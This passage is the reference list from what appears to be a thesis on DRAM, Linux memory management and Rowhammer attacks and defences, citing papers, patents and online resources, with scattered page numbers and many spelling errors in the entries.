[4] V. C. R. A. a. D. B. K. Daeyeon, ““Variation-Aware Static and Dynamic Writability Analysis for Voltage-Scaled Bit-Interleaved 8-T SRAMs””.

[5] Q. Chen, H. Mahmoodi, S. Bhunia and Kaushik, “Modeling and Testing of SRAM for New Failure Mechanisms due to Process,” West Lafayette, IN, USA.

[6] S. YOSHIMOTO, M. TERADA, S. OKUMURA, T. SUZUK, S. MIYANO and H. KAWAGUCHI, “A 40-nm 0.5-V 12.9-pJ/Access 8T SRAM Using Low-Energy,” IEICE TRANS. ELECTRON, 2012.

[7] ATP, “ATP: Understanding RAM and DRAM Computer Memory Types,” [Online]. Available: http://www.atpinc.com/Memory-insider/computer-memory-types-dram-ram-module. [Accessed 14 10 2018].

[8] J. Romo, “DDR Memories Comparison and overview,” in Beyond Bits , p. 70.

[9] Y. Asakura, “DDR Memory Trends and Design Considerations,” DRAM Solution Group, Micron Technology, Inc, 2012.

[10] I. S. NEWS, “The DRAM Story with articles by Dennard, Ithoh, Koyanagi, Sunami, Foss and Isaac,” SSCS IEEE SOLID-STATE CIRCUITS SOCIETY NEWS, vol. 13, no. 1, 2008.

[11] O. Mutlu and Y. kim, “Computer Architecture,” in Lecture 25: Main memory, Cornegie Mellon University.

[12] G. Rajinder, “Everything you always wanted to know abaout SDRAM (Memory): But were Afraid to ask,” 2010. [Online]. Available: https://www.anandtech.com/show/3851/everything-you- always-wanted-to-know-about-sdram-memory-but-were-afraid-to-ask/2.

[13] I. Singh Bhati, “Scalable and Energy Efficient DRAM Refresh Techniques,” Department of Electrical and Computer Engineering. University of Maryland, College Park.

121

[14] I. Bhati , M.-T. Chang, Z. Chishti , S.-L. Lu and B. Jacob, “DRAM Refresh Mechanisms, Penalties, and Trade-Offs,” in IEEE Transactions on computers Vol. 64, 2015.

[15] K. Kai-Wei Chang, D. Lee, Z. Chishti, A. Alameldeen, C. Wilkerson, Y. Kim and O. Mutlu, “Improving DRAM Performance by Parallelizing Refreshes with Accessed,” Carnegie Mellon University, Intel Labs, 2017.

[16] P. Chia, “New DRAM HCI Qualification Method Emphasizing on Repeted Memory Acess,” Integrity Reliability Workshop, 2010.

[17] D. Kaseridis, J. Stuecheli and L. K. John, “Minimalist open-page: A DRAM page-mode scheduling policy fo the many-core era,” in International Symposioum on Microarchitecture (MICRO), 2011.

[18] O. D. Kahn and J. R. Wilcox, “Method for dinamically adjasting a memory page closing policy”. Patent 6799241, 28 September 2004.

[19] H. David, C. Fallin, E. Gorbatov, U. R. Hanebutte and O. Mutlu, “Memory power managment via dynamic voltage/frequency scaling,” in ACM International Conference on Autonomic Computing , 2011.

[20] J. L. Hennessy and D. A. Patterson, Computer Architecture A quantitative approach., San Francisco: Elsevier, 2007.

[21] H. Wong, “Intel Ivy Bridge Cache Replacement Policy,” [Online]. Available: http://blog.stuffedcow.net/2013/01/ivb-cache-replacement/. [Accessed 18 11 2018].

[22] C. Maurice, N. Le Scouarnec, C. Neumann, O. Heen and A. Francillon, “Reverse engineering intel last-level cache complex addressing using performance counter,” in Researchs in Attacks, Intrusion, and Defenes - 18th Internation Symposioum, RAID 2015, Kyoto, Japan , 2015.

[23] G. Irazoqui, T. Eisenbarth and B. Sunar, “Systematic reverse engineering of cache slice selection in intel processors.,” in Euromicro Conference on Digital System Design, DSD 2015, Madeira, Portugal, 2015.

[24] M. Koglin, “Memory Subsystem in the Linux Kernel,” University of Hamburg, 2015.

[25] M. C. Daniel P. Bovet, “Understanding the Linux Kernel, 3rd Edition,” 2005.

[26] A. R. G. K.-H. Jonathan Corbet, “Chapter 15: Memory Mapping and DMA,” in Linux Device Drivers, 3rd Edition, 2006.

[27] Free-electronic, “Linux Kernel and Driver Development TrainingLinux Kernel and DriverDevelopment Training,” 9 February 2019. [Online]. Available: https://bootlin.com/doc/training/linux-kernel/linux-kernel-slides.pdf. [Accessed 9 February 2019].

[28] R. Prodduturi, Effective Handling of Low Memory Scnarios in Android, Bombay: Department of Computer Science and Engineering. Indian Insititute of Technology .

122

[29] A. k. Björn Brömstrup, Memory Subsystem and Data types in the Linux Kernel, University of Hamburg, 2015.

[30] M. C. Daniel P. Bovet, Understanding the Linux kernel, O´Reilly, 2000.

[31] “Memory Management and Virtual Memory,” [Online]. Available: https://slideplayer.com/slide/13277282/. [Accessed 9 2 2019].

[32] M. Porter, “Virtual memory and Linux,” in Embedded Linux Conference Europe, October, 13 2016.

[33] M. Redeker, B. Cockburn and D. Elliot, “An invesitgation into cross-talk noise in DRAM structure.,” IEEE Int. Workshop Memory Tech., pp. 123-129, 2002.

[34] D. Min and D. Langer, “Multiple twisted dataline techinque for multigigabit DRAM´s,” IEEE J. Solid-State Circuits , vol. 34, no. 6, pp. 856-865, 1999.

[35] D.-H. Kim, P. J. Nair and M. K. Qureshi, “Architecture Support for Mitigating Row Hammering in DRAM Memories,” IEEE Computer Architecture Letters, vol. 14, no. 1, January-June 2015.

[36] M. Yoo, K. Choi and W. Sun, “Saddle-fin cell transistors with oxide etch rate control by using tilted ion implantation (TIS-Fin) for sun-50-nm DRAMs,” J. Korean Phys. Soc, vol. 56, no. 2, pp. 643-647, 2010.

[37] P. Pessl, D. Gruss, C. Maurice, M. Schwarz and S. Mangard, “DRAMA: Exploiting DRAM Addressing for Cross-CPU Attacks,” 25th USENIX Security Symposium, 2016.

[38] K. Moinuddin, K. Dae-Hyun, K. Samira, J. Prashant and M. Onur, “AVATAR: A variable-retention- time (vrt) aware refresh for dram systems,” Proceedings of the IEEE/IFIP International Conference on Dependable Systems and Networks (DSN),.

[39] R. Niccolas A., Scholarly Horizons: University of Minnesota, Morris Undergraduate Journal, vol. 3, no. 1, 20016.

[40] Y. Taur and T. H. Ning, “Fundamentals of Modern VLSI Devices,” Cambridge Univ. Press, 2009.

[41] M. Lanteigne, “How Rowhammer Could Be Used to Exploit Weakness in Computer Hardware,” 2016. [Online]. Available: https://www.thirdio.com/rowhammer.pdf . [Accessed 1 April 2017].

[42] Razavi, K.; Gras, B.; Bosman, E.; Preneel, B.; Giuffrida, C.; Bos, H., “Flip feng shui: Hammering a needle in the software stack,” in Proceedings of the 25th USENIX Security Sympoisium, Austin, TX, USA, 10–12 August 2016.

[43] D. Gruss, M. Lipp, M. Schwarz, D. Genkin, J. Juffinger, S. O´Connell, W. Schoechl and Y. Yarom, “Another Flip in the Wallof Rowhammer Defenses,” in 39th IEEE Symposium on Security and Privacy 2018, 2018.

[44] X. Lou, Z. Zhang, Z. Liang and Y. Zhou, “Understanding Rowhammer Attacks trough the Lens of a Unified Referece Framework,” arXiv:1901.03538v1, 2019.

123

[45] M. Seaborn and T. Dullien, “Exploting the DRAM rowhammer bug to gain kernel privileges.,” in Proceedings of 2016 ACM SIGSAC Conference, Vienna, Austria,, 2016.

[46] E. Bosman, K. Razavi, H. Bos and C. Giuffrida, “Dedup Est Machina: Memory Deduplication as an Advanced Exploitation Vector,” in IEEE Symposium on Security Privacy, San Jose, MA, USA, 23-25 May 2016.

[47] R. Qiao and M. Seaborn, “A new approach for rowhammer attacks,” in 2016 IEEE International Symposium on Hardware Oriented Security and Trust (HOST), McLean, VA, USA, May 2016..

[48] P. Pessl, D. Gruss, C. Maurice, M. Schwarz and S. Mangard, “Reverse Engineering Intel DRAM Addressing and Exploitation,” Graz Univeristy of Technology, Austria, 27 of November 2015.

[49] Z. Aweke, S. Yitbarek, R. Qiao, R. Das, M. Hicks, Y. Oren and T. Austin, “ANVIL: Software-based protection against next-generation rowhammer attacks.,” in 21st ACM International Conference on Architectural Support for Programming Languages and Operating System (ASPLOS), Atlanta, GA, USA, 2016.

[50] O. Mutlu, “The Rowhammer Problem issues we face as Memory Becomes Denser”.

[51] B. Aichinger, “DDR memory errors caused by Row Hammer,” HPEC´15 , 2015.

[52] M. Lateigne, “How Rowhammer Coul Be Used to Exploit Weaknesses in Computer Hardware,” Third I/O Incorporated, March 2016.

[53] M. T. Aga, Z. B. Aweke and T. Austin, “When good protections go bad: Exploiting anti-dos measures to accelerate rowhammer attacks,” in Hardware Oriented Security and Trust (HOST), 2017 IEEE International Symposium, 2017.

[54] S. Bhattacharya and D. Mukhopadhyay, “Curious case of Rowhammer:Flipping Secret Exponent Bits using Timing Analysis,” India Institute of technology and Engineering, Kharagpur,India.

[55] Y. Xiao, X. Zhang, Y. Zhang and R. Teodorescu, “One Bit Flips, One Cloud Flops: Cross-VM Row Hammer Attacks and Privilege Escalation,” in Proccedings of the 25th USENIX Security Symposium, Austin, 2016.

[56] Y. Jang, J. Lee, S. Lee, and T. Kim, “SGX-Bomb: Locking Down the Processor via Rowhammer Attack” in Proceedings of the 2nd Workshop on System Software for Trusted Execution, 2017.

[57] P. Friego, “Practical Microarchitectural Attacks from Integrated GPUs,” 2017.

[58] P. Firego, C. Giufridda, H. Bos and K. Razavi, “Gand Pwning Unit: Acceleration Microarchitectural Attacks with the GPU,” 2018.

[59] A. Tatar, R. Krishman Honoth, E. Athanasopoulos, C. Giuffrida, H. Bos and K. Razavi, “Trowhammer: Rowhammer Attacks over the Network Defenses,” 2018.

[60] V. Van der Veen, M. Lindorfer, Y. Fratantonio, H. Padmanabha Pillai, G. Vigna, C. kruegel, H. Bos and K. Razavi, “GuardION: Practical Mitigation of DMA-based Rowhammer Attacks on ARM,”

124

Lecture Notes in Computer Science (including subseries Lecture Notes in Artificial Intelligence and Lecture Notes in Bioinformatics), vol. 10885, no. ISSN, pp. 1611-3349, 2018.

[61] F. Zhang, X. Lou, X. Zhao, S. Bhasin, W. He, R. Ding, S. Qureshi and K. Ren, “ Persistent fault analysis on block ciphers,” IACR Transactions on Cryptographic Hardware and Embedded System, pp. 150-172, 2018.

[62] M. Lipp, M. T. Aga, M. Schwarz, D. Gruss, C. Maurice, L. Raab, “Nethammer: Inducing rowhammer faults through network requests,” arXiv preprint arXiv:1805.04956 , 2018.

[63] Y. Cheng, S. Nepal, Zhang Zhi and Z. Wang , “Still Hammerable and Exploitable: on the Effectiveness of Software-only Physical Kernel Isolation,” arXiv, 2018.

[64] D. Gruss, M. Clémentine , A. Fogh, M. Lipp and S. Mangard, “Prefetche Side-Channel Attacks: Bypassing SMAP and Kernel ASLR,” in CSS, 2016.

[65] L. Liu, “A software Memory Partition Approach for eliminating Bank-level Interference in multicore systems,” PACT, 2012.

[66] N. Suzuki, “Coordinated Bank and Cache Coloring for Temporal Protecction of Memory Accesses,” ICESS, 2013.

[67] M. Salyzyn, “UPSTREAM: pagemap:do not leak physical address to non-privilage userspace,” 2015. [Online]. Available: https://android- review.googlesource.com/#/c/kernel/common/+/182766. [Accessed 25 01 2019].

[68] Kerner org. [Online]. Available: https://www.kernel.org/doc/Documentation/vm/pagemap.txt.

[69] C. Maurice, N. Le Scouarnec, C. Neuman, O. Henn and A. Francillon, “Reverse Enginnering Intel Last level Cache Complex Addressing Using Performance Counters,” Procceding of the 18th internationa Symposioum onn Reasearch in Attacks, Instructions and Defenses (RAID´15), 2015.

[70] M. Seaborn, “How physical addresses map to rows and banks in DRAM,” May 2015. [Online]. Available: http://lackingrhoticity.blogspot.com/2015/05/how-physical-addresses-map-to-rows- and-banks.html. [Accessed 21 10 2018].

[71] M. Seaborn and T. Dullien, “http://googleprojectzero.blogspot.com/2015/03/exploiting-dram- rowhammer-bug-to-gain.html,” March 2015. [Online].

[72] Google, “ https://github.com/google/rowhammer-test,” [Online].

[73] G. Irazoqui, T. Eisenbarth and B. Sunar, “Cross processor cache attacks,” in Proceedings of the 2016 ACM Asia Conference Computer Communications Security, Xi’an, China, 30 May–3 June 2016.

[74] R. Owens and W. Wang, “Non-interactive OS fingerprinting trough memory-deduplication technique in virtual machines.,” IPCCC, 2011.

[75] A. Barresi, K. Razavi, M. Payer and T. R. Gross, “CAIN: Sinlently breaking ASLR in the cloud,” WOOT, 2015.

125

[76] Linux, “Video4Linux,” 2014. [Online]. Available: https://en.wikipedia.org/wiki/Video4Linux.

[77] H. Mei-Chen, K. T. Timothy and K. I. Ravishankar, “Fault Injection Techinques and Tools,” University of Illinois at Urbana-Champaign.

[78] F. Prieto, “Practical Microarchitectural Attacks from Integrated GPUs,” 18 12 2018. [Online]. Available: https://repository.tudelft.nl/islandora/object/uuid%3Ac0d3c629-4c67-4741-9776- 05802d89872f. [Accessed 1 10 2019].

[79] D. Lizenberger, “PyCrypto - The Python Cryptography Toolkit,” [Online]. Available: https://www.dlitz.net/software/pycrypto/. [Accessed 27 12 2018].

[80] D. K. Gillmor, “pem2openpgp - translate PEM-encoded RSA key to OpenPGP certificates,” [Online].

[81] A. Inc, “Mac EFI security update 2015-001,” 2015.

[82] H. Packard, “Moonshot Component Pack Version,” 2015.

[83] Lenovo, “Row hammer Privilage Escalation,” 2015.

[84] L. Ghasempour, M. Lujan and J. Garside , “ARMOR: A run-time memory Hot-Row detector,” 2015. [Online]. Available: http://apt.cs.manchester.ac.uk/projects/ARMOR/RowHammer/armor.html. [Accessed 9 February 2019].

[85] G. Irazoqui, T. Eisenbarth and B. Sunar, “MASCAT: Stopping microarchitectural attacks before execution,” Cryptology ePrint Archive, 2017.

[86] N. Herath and A. Fogh, “These is Not Your Grand Daddys CPU Performance Counters - CPU Hardware Performance COunters for Security,” Black Hat Briefings (DAC), 2015.

[87] D. Gruss, C. Maurice, K. Wagner and S. Mangard, “Flus+FLush: A Fast and Stealthy Cache Attack,” DIMVA, 2016.

[88] E. Chiappetta, E. Savas and C. Yilmaz, “Real time detection of cache-based side-channel attacks using hardware performance counters,” Cryptology ePrint Archive, 2015.

[89] J. Corbet, “Defending against Rowhammer in the kernel,” October 2016.

[90] S. Vig, S.-K. Lam, S. Bhattacharya and D. Mukhopadhyay, “Rapid detection of rowhammer attacks using dynamic skewed has tree,” Proceeding of the 7th International Workshop on Hardware and Architectural Support for Security and Privacu, p. 7, 2018.

[91] F. F. Brasser, L. Davi, D. Gens, C. Liebchen and A.-R. Sadeghi, “Can't touch this: Practical and generic software-only defenses against rowhammer attacks,” CoRR, 2016.

[92] “Zebram: Comprehensive and compatible software protection against Rowhammer,” in 13th USENIX Symposioum on Operating Systems Design and Implementation (OSDI 2018), Carlsbad, CA, 2018.

126

[93] A. Limited, ARM Architecture Reference Manual ARMv7-A and ARMV7-R edition, 2014.

[94] “Embedded Linux Wiki,” [Online]. Available: https://elinux.org/Tims_Notes_on_ARM_memory_allocation.

[95] R. Pi. [Online]. Available: https://www.raspberrypi.org/.

[96] BeagleBoard. [Online]. Available: https://beagleboard.org/.

[97] R. pi. [Online]. Available: https://github.com/raspberrypi/linux/blob/rpi- 4.19.y/arch/arm/mm/cache-v7.S. [Accessed 20 3 2019].

[98] T. Instruments, “CMEM detailed description,” [Online]. Available: http://software- dl.ti.com/dsps/dsps_public_sw/sdo_sb/targetcontent/linuxutils/latest_2_x/docs/html/cmem_8 h.html. [Accessed 17 3 2019].

[99] VSEC. Group, “https://www.vusec.net/,” [Online].

[100] VUSec, “GItHub,” 2017. [Online]. Available: https://github.com/vusec/drammer. [Accessed 14 3 2019].

[101] R. K. , 17 November 2005. [Online]. Available: https://www.kernel.org/doc/Documentation/arm/memory.txt.

[102] LWN.net, “The Android ION memory allocator,” [Online]. Available: https://lwn.net/Articles/480055/ .

[103] Google, “android-msm-hammerhead-3.4-kitkat-mr2 kernel sources,” [Online]. Available: https://android.googlesource.com/kernel/msm/+/android-msm-hammerhead-3.4-kitkat-mr2.

[104] A. Limited, ARM Architecture Reference Manual . ARmv8 and ARMv8-A architecture profile, 2013.

[105] V. group, “https://github.com/vusec/drammer,” [Online]. [Accessed on 3 Nov 2016].

[106] T. Dullien, “3 things that Rowhammer taught me and thir implication for future security researche”.

[107] N. Zhang, K. Sun, D. Shands, W. Lou and Y. Hou, “TruSpy: Cache Side-Channel Information Leakage from the Secure World on ARM Devices,” in Cryptology ePrint Archive Report 2016/980, 2016.

[108] D. A. Osvik, A. Shamir and E. Tromer, “Cache attacks and countermeasure: the case of aes,” in Topics in Cryptology-CT-RSA, Springer, 2006.

[109] C. Percival, “Cache missing for fun and profit,” in Proccedings of BSDCan, 2005.

[110] D. Gullasch, E. Bangerter and S. Krenn, “Cache games - Bringing Access-Based Cache Attacks,” in DIMVA´16, 2016.

127

[111] Y. Yarom and K. Falkner, “FLUSH+RELOAD: A High Resolution, Low Noise, L3 Cache Side-Channel Attack,” in USENIX Security´14, 2014.

[112] X. Zhang, “Return-oriented flush-reload side channels on arm and their implications for android security.,” in 2016 ACM SIGSAC Conference on Computer Communications Security (CCS’16), Vienna, Austria,, October 2016.

[113] H. W. Lenstra, “Factoring integers with elliptic curves,” Annals of Mathematics, 1987.

[114] J. Jithin , S. Hari, L. Miao, Z. Minjia, H. Jian, W.-u.-R. Md. , S. I. Nusrat, O. Xiangyong, W. Hao , S. Sayantan and K. P. Dhabaleswar, “Memcached Design on HIgh Performance RDMA Capable- Interconnects,” in International COnference on Paraller Processing, 2011.

128